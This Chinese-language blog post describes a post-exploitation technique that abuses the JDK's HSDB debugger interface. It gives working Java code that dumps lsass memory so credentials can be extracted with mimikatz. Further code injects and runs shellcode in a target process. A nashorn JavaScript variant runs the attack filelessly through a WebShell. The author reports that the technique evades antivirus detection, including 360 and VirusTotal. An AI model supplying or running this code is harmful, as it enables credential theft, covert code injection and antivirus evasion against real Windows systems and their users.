JVM HSDB在后渗透中的利用
背景
HSDB(Hotspot Debugger),是JDK自带的调试工具,可用于调试JVM 运行时数据。 最近在学习Beichen师傅《JVM核心对抗》PPT的时候,注意到提到了HSDB的一个玩法:利用其中的windbg调试接口进行dump lsass以及加载Shellcode操作,本文进行学习以及一些武器化利用扩展。
dump lsass
lsass是windows中处理本地安全和登录策略的重要进程,几乎所有的windows身份认证程序都离不开lsass进程。因此在lsass的内存中会保存用户相关的凭证。它是windows主机中凭证的重要组成部分,因此获取lsass内存也是MITRE ATT&CK框架中Credential Access战术下的重要技术点。
由于许多带签名的正常程序都需要用到内存dump功能,让用户能查看进程在内存中的信息,所以以往的对抗主要是通过一些常见的白进程签名程序,利用程序的正常功能来获取windows lsass中的内存。不过由于用得太多了,基本都已经被各大杀软所监控标记。今天的HSDB属于一个新的小众白名单利用。 核心原理是JVM在调试进程的时候,会调用windbg接口,并且支持输入自定义的windbg语句,从而实现dump lsass 具体代码
1. `public static void dumper(int pid, String path) {`
2. `WindbgDebuggerLocal debuggerLocal = new WindbgDebuggerLocal(new MachineDescriptionAMD64(), false);`
3. `debuggerLocal.attach(pid);`
4. `System.out.println(debuggerLocal.consoleExecuteCommand(".dump /ma " + path));`
5. `debuggerLocal.detach();`
6. `}`
打包个jar运行,发现已经成功dump了lsass然后用mimikatz dump出其中的凭证VT 0/62免杀360无告警
为了对比测试,继续跑一下已经公开过的白利用。360告警拦截,dump提示拒绝访问。
加载ShellCode
windbg是一款很强大的调试工具,我们还可以利用该接口进行ShellCode的加载。基本流程:
-
申请内存
-
写入Shellcode
-
修改当前运行指针到Shellcode位置
Beichen师傅的PPT里没有贴写入Shellcode的实现代码,这里其实有很多种方式,我这里采用eb命令实现。其实用Unsafe也可以,但是Unsafe特征比较明显。 核心代码
1. `public static void Runshellcode(int pid, String shellcode) {`
2. `WindbgDebuggerLocal debuggerLocal = new WindbgDebuggerLocal(new MachineDescriptionAMD64(), false);`
3. `debuggerLocal.attach(pid);`
4. `System.out.println(shellcode.length());`
5. `String result = debuggerLocal.consoleExecuteCommand(".dvalloc 10000");`
6. `String addressToken = "starting at ";`
7. `System.out.println(result);`
8. `int index = result.indexOf(addressToken);`
9. `String address = result.substring(index + addressToken.length()).trim();`
10. `String s1 = debuggerLocal.consoleExecuteCommand("eb " + address + " " + hexFormat(shellcode));`
11. `System.out.println(s1);`
12. `String s2 = debuggerLocal.consoleExecuteCommand("r @$ip=" + address);`
13. `System.out.println(s2);`
14. `debuggerLocal.detach();`
15. `}`
同样秒过3xx。
当然这里只是注入方式不被查杀,如果是cs或者msf还要改一下内存特征。
可能遇到的报错
必须是JDK下的jre运行才可以,否则可能会产生以下报错解决办法:复制jdk下的dll到对应目录下https://blog.csdn.net/fl\_zxf/article/details/42689569
单文件执行
不同版本的sa-jdi可能不一样,如果选择jar方式的话要打包跟目标JDK环境一致的依赖,这样有点麻烦。 除了打一个jar包以外,还可以单文件执行
1. `java -cp ".;c:\\xxxxx\\sa-jdi.jar" Exp`
As-Exploits无文件利用
想要在WebShell中利用需要满足两点:
-
加载sa-jdi.jar到ClassLoader
-
加载调用逻辑
对于第一点,sa-jdi.jar在JDK中默认存在,不需要额外上传,只需要用JarLoader功能加载一下就可以了 第二点,在As-Exploits 1.5中新增了JS引擎执行模块,这里我采用了JS引擎来实现功能的调用。(当然写个Class编译然后再defineClass加载也可以,稍微有点麻烦) 将payload改写为nashorn语法,跑一下看起来没问题
1. `var windbg = Java.type("sun.jvm.hotspot.debugger.windbg.WindbgDebuggerLocal");`
2. `var desc = Java.type("sun.jvm.hotspot.debugger.MachineDescriptionAMD64");`
3. `var debuggerLocal = new windbg(new desc(), false);`
4. `debuggerLocal.attach(784);`
5. `java.lang.System.out.println(`
6. `debuggerLocal.consoleExecuteCommand(".dump /ma ./dsds")`
7. `);`
8. `debuggerLocal.detach();`
具体操作:到目录界面看,dump文件已经生成了
